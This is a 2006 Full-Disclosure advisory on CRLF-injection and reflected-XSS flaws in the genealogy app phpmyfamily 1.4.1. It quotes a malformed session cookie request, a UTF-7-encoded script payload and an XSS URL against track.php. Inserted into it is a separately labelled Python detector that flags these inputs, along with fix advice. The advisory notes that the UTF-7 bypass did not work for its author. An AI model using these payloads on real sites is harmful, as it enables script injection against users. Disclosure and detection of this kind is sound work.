
List:       full-disclosure
Subject:    [Full-disclosure] HYSA-2006-007 phpmyfamily 1.4.1 CRLF injection &
From:       h4cky0u <h4cky0u.org () gmail ! com>
Date:       2006-03-27 8:58:09
Message-ID: 68cbfab10603270046x5ab00245gfc95f5ac3100aedf () mail ! gmail ! com

------------------------------------------------------
      HYSA-2006-007 h4cky0u.org Advisory 016
------------------------------------------------------
Date - Mon March 27 2006


TITLE:
======

phpmyfamily v1.4.1 CRLF injection & XSS


SEVERITY:
=========

Medium


SOFTWARE:
=========

phpmyfamily v1.4.1

http://www.phpmyfamily.net/


INFO:
=====

phpmyfamily is a dynamic genealogy website builder which allows
geographically dispersed family members to maintain a central database of
research which is readily accessible and editable.


DESCRIPTION:
============

--== CRLF Injection ==--

GET /phpmyfamily/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close

Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88

You can try to encode <script>alert('matrix_killer');</script> in UTF-7 like
this:

+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer');
+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-

This way you can bypass the protection, but I'm not sure that it will work.
For me it didn't, but I'm still a beginner with the CRLF attacks.

--== XSS ==--

http://127.0.0.1/phpmyfamily/track.php?person=00001&name='><script>alert();</script>&email=1&action=sub&submit=Wy%B6lij
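The two requests quoted above share one defender's lesson: the malformed PHPSESSID cookie is rejected by session_start(), and because display_errors is on the warning leaks the install path into the response, while the track.php URL reflects the name parameter into the page unencoded. The script below is an added example, not part of this advisory or of phpmyfamily. It runs both checks over the advisory's own request, URL and UTF-7 string (copied from the text above): the cookie value is tested against the character rule PHP's warning states, and query parameters are tested for script markup after UTF-7 normalisation, so the +ADw-... form is caught as well as the plain <script> form. The function names and the percent-encoded UTF-7 query are my own construction.

```python
"""Added example (not from the advisory or from phpmyfamily): a defender's
two checks over the request and URL quoted in HYSA-2006-007.

1. The PHPSESSID value is tested against the character rule PHP's own
   warning states (a-z, A-Z, 0-9, '-' and ','); anything else is what made
   session_start() emit the path-disclosing warning.
2. Query parameters are tested for script markup after UTF-7 normalisation,
   so the '+ADw-...' form is caught as well as the plain '<script>' form.
Sample inputs are copied from the advisory; function names are my own.
"""
import re
from urllib.parse import parse_qs, quote, urlsplit

# Character set PHP accepts for a session id, as quoted in the advisory's warning.
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9,-]+$")

# Opening or closing <script> tag, checked only after encodings are normalised.
MARKUP_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)

# --- samples copied from the advisory ----------------------------------------
ADVISORY_REQUEST = "\r\n".join([
    "GET /phpmyfamily/ HTTP/1.0",
    "Accept: */*",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)",
    "Host: 127.0.0.1:80",
    "Cookie: PHPSESSID=-4-2-=674sdasaf_",
    "Connection: Close",
]) + "\r\n\r\n"

XSS_URL = ("http://127.0.0.1/phpmyfamily/track.php?person=00001"
           "&name='><script>alert();</script>&email=1&action=sub&submit=Wy%B6lij")

UTF7_PAYLOAD = ("+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer'); "
                "+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-")

# Constructed: in a query string a literal '+' reads as a space, so a UTF-7
# value only survives URL parsing if its '+' signs are percent-encoded.
UTF7_QUERY = "name=" + quote(UTF7_PAYLOAD, safe="")


def valid_session_id(value: str) -> bool:
    """True if the cookie value would pass PHP's session id character check."""
    return bool(SESSION_ID_RE.match(value))


def normalise(value: str) -> str:
    """Decode UTF-7 shift sequences ('+...-') if present; else return as-is."""
    if "+" in value and "-" in value:
        try:
            return value.encode("ascii").decode("utf-7")
        except (UnicodeEncodeError, UnicodeDecodeError):
            return value
    return value


def reflected_markup(query: str) -> dict:
    """Map each query parameter whose decoded value carries <script> markup
    to that decoded value."""
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            decoded = normalise(raw)
            if MARKUP_RE.search(decoded):
                hits[name] = decoded
    return hits


def reflected_markup_in_url(url: str) -> dict:
    """Same check, starting from a full URL."""
    return reflected_markup(urlsplit(url).query)


def audit_request(raw: str) -> list:
    """Run both checks over a raw HTTP request; return human-readable findings."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.splitlines()
    _method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        key, _, val = line.partition(":")
        headers[key.strip().lower()] = val.strip()
    findings = []
    for part in headers.get("cookie", "").split(";"):
        key, _, val = part.strip().partition("=")
        if key == "PHPSESSID" and not valid_session_id(val):
            findings.append(f"session id {val!r} fails PHP's [A-Za-z0-9,-] rule")
    for name, value in reflected_markup_in_url(target).items():
        findings.append(f"parameter {name!r} carries script markup: {value!r}")
    return findings


if __name__ == "__main__":
    for finding in audit_request(ADVISORY_REQUEST):
        print(finding)
    print(reflected_markup_in_url(XSS_URL))
    print(reflected_markup(UTF7_QUERY))
```

The UTF-7 step is the point a naive filter misses: "+ADw-" is only "<" once the decoder has run, so any check that looks for "<script" must normalise the encoding first, and the same logic applies server-side, where the fix is to validate the session id before calling session_start(), keep display_errors off in production, and HTML-encode name before echoing it.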



VENDOR STATUS:
==============

Vendor was contacted but no response has been received to date.


CREDITS:
========

This vulnerability was discovered and researched by matrix_killer of h4cky0u
Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Co-Researcher:

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr, EcLiPsE and all who support us !!!


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt

--
http://www.h4cky0u.org
(In)Security at its best...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
